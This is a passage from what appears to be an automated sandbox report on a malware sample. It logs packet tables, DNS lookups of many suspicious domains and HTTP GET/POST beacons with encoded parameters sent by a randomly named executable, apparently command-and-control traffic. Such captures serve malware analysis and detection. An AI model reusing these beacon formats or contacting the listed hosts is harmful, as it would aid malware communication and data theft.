                                                    Aug 5, 2024 15:33:41.059062958 CEST5543680192.168.2.476.223.67.189
                                                    Aug 5, 2024 15:33:41.064434052 CEST805543676.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:41.065120935 CEST5543680192.168.2.476.223.67.189
                                                    Aug 5, 2024 15:33:41.071110010 CEST5543680192.168.2.476.223.67.189
                                                    Aug 5, 2024 15:33:41.076019049 CEST805543676.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:41.525732994 CEST805543676.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:41.525809050 CEST5543680192.168.2.476.223.67.189
                                                    Aug 5, 2024 15:33:42.571044922 CEST5543680192.168.2.476.223.67.189
                                                    Aug 5, 2024 15:33:42.575922012 CEST805543676.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:43.589391947 CEST5543780192.168.2.476.223.67.189
                                                    Aug 5, 2024 15:33:43.594414949 CEST805543776.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:43.594477892 CEST5543780192.168.2.476.223.67.189
                                                    Aug 5, 2024 15:33:43.597143888 CEST5543780192.168.2.476.223.67.189
                                                    Aug 5, 2024 15:33:43.601949930 CEST805543776.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:43.601970911 CEST805543776.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:43.602037907 CEST805543776.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:43.602047920 CEST805543776.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:43.602056026 CEST805543776.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:43.602238894 CEST805543776.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:43.602247953 CEST805543776.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:43.602258921 CEST805543776.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:43.602268934 CEST805543776.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:44.056294918 CEST805543776.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:44.056356907 CEST5543780192.168.2.476.223.67.189
                                                    Aug 5, 2024 15:33:45.103028059 CEST5543780192.168.2.476.223.67.189
                                                    Aug 5, 2024 15:33:45.109011889 CEST805543776.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:46.126838923 CEST5543880192.168.2.476.223.67.189
                                                    Aug 5, 2024 15:33:46.131948948 CEST805543876.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:46.132033110 CEST5543880192.168.2.476.223.67.189
                                                    Aug 5, 2024 15:33:46.133927107 CEST5543880192.168.2.476.223.67.189
                                                    Aug 5, 2024 15:33:46.138938904 CEST805543876.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:46.607428074 CEST805543876.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:46.609989882 CEST805543876.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:33:46.610246897 CEST5543880192.168.2.476.223.67.189
                                                    Aug 5, 2024 15:33:46.612720013 CEST5543880192.168.2.476.223.67.189
                                                    Aug 5, 2024 15:33:46.618917942 CEST805543876.223.67.189192.168.2.4
                                                    Aug 5, 2024 15:34:00.162719965 CEST5543980192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:00.168258905 CEST8055439116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:00.168335915 CEST5543980192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:00.170471907 CEST5543980192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:00.177793026 CEST8055439116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:01.680859089 CEST5543980192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:01.731646061 CEST8055439116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:02.698523045 CEST5544080192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:02.704071045 CEST8055440116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:02.707221985 CEST5544080192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:02.711033106 CEST5544080192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:02.716128111 CEST8055440116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:04.213660955 CEST5544080192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:04.263770103 CEST8055440116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:05.229712963 CEST5544180192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:05.234765053 CEST8055441116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:05.234997034 CEST5544180192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:05.237059116 CEST5544180192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:05.242029905 CEST8055441116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:05.242050886 CEST8055441116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:05.242880106 CEST8055441116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:05.242889881 CEST8055441116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:05.242897987 CEST8055441116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:05.242907047 CEST8055441116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:05.242914915 CEST8055441116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:05.242924929 CEST8055441116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:05.242933989 CEST8055441116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:06.742130041 CEST5544180192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:06.787885904 CEST8055441116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:07.761679888 CEST5544280192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:07.767213106 CEST8055442116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:07.767288923 CEST5544280192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:07.770054102 CEST5544280192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:07.774924994 CEST8055442116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:21.520807028 CEST8055439116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:21.520875931 CEST5543980192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:24.794507027 CEST8055440116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:24.794651985 CEST5544080192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:24.795293093 CEST8055440116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:24.795717001 CEST5544080192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:24.797950029 CEST8055440116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:24.801095963 CEST5544080192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:24.804071903 CEST8055440116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:24.806130886 CEST8055440116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:26.618369102 CEST8055441116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:26.619210958 CEST5544180192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:29.153997898 CEST8055442116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:29.154258013 CEST5544280192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:29.155030966 CEST5544280192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:29.159903049 CEST8055442116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:34.654230118 CEST5544380192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:34.660464048 CEST8055443116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:34.660579920 CEST5544380192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:34.662576914 CEST5544380192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:34.667555094 CEST8055443116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:36.179851055 CEST5544380192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:36.231822968 CEST8055443116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:37.199548960 CEST5544480192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:37.204577923 CEST8055444116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:37.204773903 CEST5544480192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:37.207216024 CEST5544480192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:37.212331057 CEST8055444116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:38.715085983 CEST5544480192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:38.763685942 CEST8055444116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:39.730070114 CEST5544580192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:39.736476898 CEST8055445116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:39.736596107 CEST5544580192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:39.739084959 CEST5544580192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:39.745563984 CEST8055445116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:39.745579958 CEST8055445116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:39.745592117 CEST8055445116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:39.745604038 CEST8055445116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:39.745676994 CEST8055445116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:39.745696068 CEST8055445116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:39.745810986 CEST8055445116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:39.745826006 CEST8055445116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:39.745837927 CEST8055445116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:41.642469883 CEST5544580192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:41.688848019 CEST8055445116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:42.651164055 CEST5544680192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:42.656857967 CEST8055446116.213.43.190192.168.2.4
                                                    Aug 5, 2024 15:34:42.657126904 CEST5544680192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:42.658773899 CEST5544680192.168.2.4116.213.43.190
                                                    Aug 5, 2024 15:34:42.664259911 CEST8055446116.213.43.190192.168.2.4

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Aug 5, 2024 15:30:57.485336065 CEST53560161.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:31:16.440835953 CEST5878453192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:31:16.691775084 CEST53587841.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:31:32.244980097 CEST5762853192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:31:33.242818117 CEST5762853192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:31:34.241879940 CEST5762853192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:31:34.445352077 CEST53576281.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:31:34.445378065 CEST53576281.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:31:34.445394039 CEST53576281.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:31:48.010956049 CEST6552353192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:31:48.289633036 CEST53655231.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:32:02.089592934 CEST5353453192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:32:02.123666048 CEST53535341.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:32:16.262908936 CEST5650253192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:32:16.324610949 CEST53565021.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:32:29.605334044 CEST5666953192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:32:29.624027967 CEST53566691.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:32:43.683518887 CEST6336753192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:32:43.697736025 CEST53633671.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:32:56.935005903 CEST5038153192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:32:57.124891043 CEST53503811.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:33:10.390959024 CEST5662053192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:33:10.922528982 CEST53566201.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:33:24.485579967 CEST6247453192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:33:25.174489021 CEST53624741.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:33:38.496629953 CEST6073553192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:33:38.512896061 CEST53607351.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:33:51.622375965 CEST5436953192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:33:51.633873940 CEST53543691.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:33:59.700078964 CEST5566453192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:34:00.159919024 CEST53556641.1.1.1192.168.2.4
                                                    Aug 5, 2024 15:34:34.168554068 CEST6456353192.168.2.41.1.1.1
                                                    Aug 5, 2024 15:34:34.651662111 CEST53645631.1.1.1192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Aug 5, 2024 15:31:16.440835953 CEST192.168.2.41.1.1.10x9278Standard query (0)www.stemfiniti.comA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:31:32.244980097 CEST192.168.2.41.1.1.10x6812Standard query (0)www.zhuan-tou.comA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:31:33.242818117 CEST192.168.2.41.1.1.10x6812Standard query (0)www.zhuan-tou.comA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:31:34.241879940 CEST192.168.2.41.1.1.10x6812Standard query (0)www.zhuan-tou.comA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:31:48.010956049 CEST192.168.2.41.1.1.10xb417Standard query (0)www.lecoinsa.netA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:32:02.089592934 CEST192.168.2.41.1.1.10x8c86Standard query (0)www.8xbe578.appA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:32:16.262908936 CEST192.168.2.41.1.1.10xfdf1Standard query (0)www.synergon.spaceA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:32:29.605334044 CEST192.168.2.41.1.1.10x26b6Standard query (0)www.alanbeanart.comA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:32:43.683518887 CEST192.168.2.41.1.1.10x55c4Standard query (0)www.kacotae.comA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:32:56.935005903 CEST192.168.2.41.1.1.10x386aStandard query (0)www.slushcafe.topA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:10.390959024 CEST192.168.2.41.1.1.10x339fStandard query (0)www.a9jcpf.topA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:24.485579967 CEST192.168.2.41.1.1.10x878eStandard query (0)www.tqfabxah.comA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:38.496629953 CEST192.168.2.41.1.1.10xf78dStandard query (0)www.rtrpodcast.onlineA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:51.622375965 CEST192.168.2.41.1.1.10xebfStandard query (0)www.winkthree.comA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:59.700078964 CEST192.168.2.41.1.1.10x5bcaStandard query (0)www.mqmsqkw.lolA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:34:34.168554068 CEST192.168.2.41.1.1.10x7da9Standard query (0)www.lfghtko.lolA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Aug 5, 2024 15:31:16.691775084 CEST1.1.1.1192.168.2.40x9278No error (0)www.stemfiniti.comstemfiniti.comCNAME (Canonical name)IN (0x0001)false
                                                    Aug 5, 2024 15:31:16.691775084 CEST1.1.1.1192.168.2.40x9278No error (0)stemfiniti.com3.33.130.190A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:31:16.691775084 CEST1.1.1.1192.168.2.40x9278No error (0)stemfiniti.com15.197.148.33A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:31:34.445352077 CEST1.1.1.1192.168.2.40x6812No error (0)www.zhuan-tou.com38.12.1.29A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:31:34.445378065 CEST1.1.1.1192.168.2.40x6812No error (0)www.zhuan-tou.com38.12.1.29A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:31:34.445394039 CEST1.1.1.1192.168.2.40x6812No error (0)www.zhuan-tou.com38.12.1.29A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:31:48.289633036 CEST1.1.1.1192.168.2.40xb417No error (0)www.lecoinsa.net217.116.0.191A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:32:02.123666048 CEST1.1.1.1192.168.2.40x8c86No error (0)www.8xbe578.app8xbe578.appCNAME (Canonical name)IN (0x0001)false
                                                    Aug 5, 2024 15:32:02.123666048 CEST1.1.1.1192.168.2.40x8c86No error (0)8xbe578.app3.33.130.190A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:32:02.123666048 CEST1.1.1.1192.168.2.40x8c86No error (0)8xbe578.app15.197.148.33A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:32:16.324610949 CEST1.1.1.1192.168.2.40xfdf1No error (0)www.synergon.spacesynergon.spaceCNAME (Canonical name)IN (0x0001)false
                                                    Aug 5, 2024 15:32:16.324610949 CEST1.1.1.1192.168.2.40xfdf1No error (0)synergon.space109.95.158.127A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:32:29.624027967 CEST1.1.1.1192.168.2.40x26b6No error (0)www.alanbeanart.comalanbeanart.comCNAME (Canonical name)IN (0x0001)false
                                                    Aug 5, 2024 15:32:29.624027967 CEST1.1.1.1192.168.2.40x26b6No error (0)alanbeanart.com3.33.130.190A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:32:29.624027967 CEST1.1.1.1192.168.2.40x26b6No error (0)alanbeanart.com15.197.148.33A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:32:43.697736025 CEST1.1.1.1192.168.2.40x55c4No error (0)www.kacotae.com64.226.69.42A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:32:57.124891043 CEST1.1.1.1192.168.2.40x386aNo error (0)www.slushcafe.top203.161.55.102A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:10.922528982 CEST1.1.1.1192.168.2.40x339fNo error (0)www.a9jcpf.topkmdne.ajunsdfancsda.comCNAME (Canonical name)IN (0x0001)false
                                                    Aug 5, 2024 15:33:10.922528982 CEST1.1.1.1192.168.2.40x339fNo error (0)kmdne.ajunsdfancsda.com216.83.33.140A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:10.922528982 CEST1.1.1.1192.168.2.40x339fNo error (0)kmdne.ajunsdfancsda.com216.83.33.189A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:10.922528982 CEST1.1.1.1192.168.2.40x339fNo error (0)kmdne.ajunsdfancsda.com216.83.33.143A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:10.922528982 CEST1.1.1.1192.168.2.40x339fNo error (0)kmdne.ajunsdfancsda.com216.83.33.141A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:10.922528982 CEST1.1.1.1192.168.2.40x339fNo error (0)kmdne.ajunsdfancsda.com216.83.33.145A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:25.174489021 CEST1.1.1.1192.168.2.40x878eNo error (0)www.tqfabxah.com35.241.42.217A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:38.512896061 CEST1.1.1.1192.168.2.40xf78dNo error (0)www.rtrpodcast.onlinertrpodcast.onlineCNAME (Canonical name)IN (0x0001)false
                                                    Aug 5, 2024 15:33:38.512896061 CEST1.1.1.1192.168.2.40xf78dNo error (0)rtrpodcast.online76.223.67.189A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:38.512896061 CEST1.1.1.1192.168.2.40xf78dNo error (0)rtrpodcast.online13.248.213.45A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:33:51.633873940 CEST1.1.1.1192.168.2.40xebfName error (3)www.winkthree.comnonenoneA (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:34:00.159919024 CEST1.1.1.1192.168.2.40x5bcaNo error (0)www.mqmsqkw.lol116.213.43.190A (IP address)IN (0x0001)false
                                                    Aug 5, 2024 15:34:34.651662111 CEST1.1.1.1192.168.2.40x7da9No error (0)www.lfghtko.lol116.213.43.190A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.stemfiniti.com
                                                    • www.zhuan-tou.com
                                                    • www.lecoinsa.net
                                                    • www.8xbe578.app
                                                    • www.synergon.space
                                                    • www.alanbeanart.com
                                                    • www.kacotae.com
                                                    • www.slushcafe.top
                                                    • www.a9jcpf.top
                                                    • www.tqfabxah.com
                                                    • www.rtrpodcast.online
                                                    • www.mqmsqkw.lol
                                                    • www.lfghtko.lol

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.4553973.33.130.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:31:16.704848051 CEST439OUTGET /toda/?GTP=uhqpjxIPh&efM=obOL9JCgNxwS4++cuMdB8oKy9gH02j2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPeZjD4+ekebMUnDMBnOUVwsozzcXjkZdwt+Kw= HTTP/1.1
                                                    Host: www.stemfiniti.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:31:17.205013990 CEST393INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:31:17 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 253
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 54 50 3d 75 68 71 70 6a 78 49 50 68 26 65 66 4d 3d 6f 62 4f 4c 39 4a 43 67 4e 78 77 53 34 2b 2b 63 75 4d 64 42 38 6f 4b 79 39 67 48 30 32 6a 32 67 30 73 48 56 5a 6b 79 62 69 68 51 30 46 6f 56 33 35 43 30 4f 46 31 44 52 71 66 4a 68 38 69 69 73 77 54 77 4a 51 55 56 38 37 6d 2b 59 4e 2f 71 6b 4c 62 50 65 5a 6a 44 34 2b 65 6b 65 62 4d 55 6e 44 4d 42 6e 4f 55 56 77 73 6f 7a 7a 63 58 6a 6b 5a 64 77 74 2b 4b 77 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GTP=uhqpjxIPh&efM=obOL9JCgNxwS4++cuMdB8oKy9gH02j2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPeZjD4+ekebMUnDMBnOUVwsozzcXjkZdwt+Kw="}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.45539938.12.1.29802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:31:34.455704927 CEST706OUTPOST /pjmu/ HTTP/1.1
                                                    Host: www.zhuan-tou.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.zhuan-tou.com
                                                    Referer: http://www.zhuan-tou.com/pjmu/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 2b 6a 66 39 32 4f 4e 31 36 59 6b 49 66 54 72 59 7a 4e 41 32 41 32 31 33 7a 6b 79 64 76 4b 35 73 43 77 5a 4a 65 52 53 6c 66 48 38 59 4b 59 61 48 45 4a 33 39 55 47 4c 31 6a 59 68 30 4e 32 4e 48 42 38 52 5a 77 74 68 2f 4f 73 4b 44 7a 50 4c 71 78 30 72 45 5a 68 38 4e 55 75 39 46 68 6c 66 4b 56 47 36 61 4d 35 79 38 43 67 6c 47 31 39 2f 7a 47 69 4b 6d 41 6c 52 38 57 56 67 2f 2f 42 6f 39 47 37 58 4b 56 6e 4d 59 4b 56 56 56 62 5a 2b 34 34 31 58 72 48 7a 4a 69 57 37 49 69 70 4c 7a 72 61 65 66 2b 54 6f 66 56 72 4c 5a 67 6d 65 56 58 52 43 4a 70 45 55 6f 51 31 65 5a 38 54 30 78 32 59 67 3d 3d
                                                    Data Ascii: efM=+jf92ON16YkIfTrYzNA2A213zkydvK5sCwZJeRSlfH8YKYaHEJ39UGL1jYh0N2NHB8RZwth/OsKDzPLqx0rEZh8NUu9FhlfKVG6aM5y8CglG19/zGiKmAlR8WVg//Bo9G7XKVnMYKVVVbZ+441XrHzJiW7IipLzraef+TofVrLZgmeVXRCJpEUoQ1eZ8T0x2Yg==
                                                    Aug 5, 2024 15:31:35.346323013 CEST691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 05 Aug 2024 13:31:35 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.45540038.12.1.29802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:31:36.995434046 CEST726OUTPOST /pjmu/ HTTP/1.1
                                                    Host: www.zhuan-tou.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
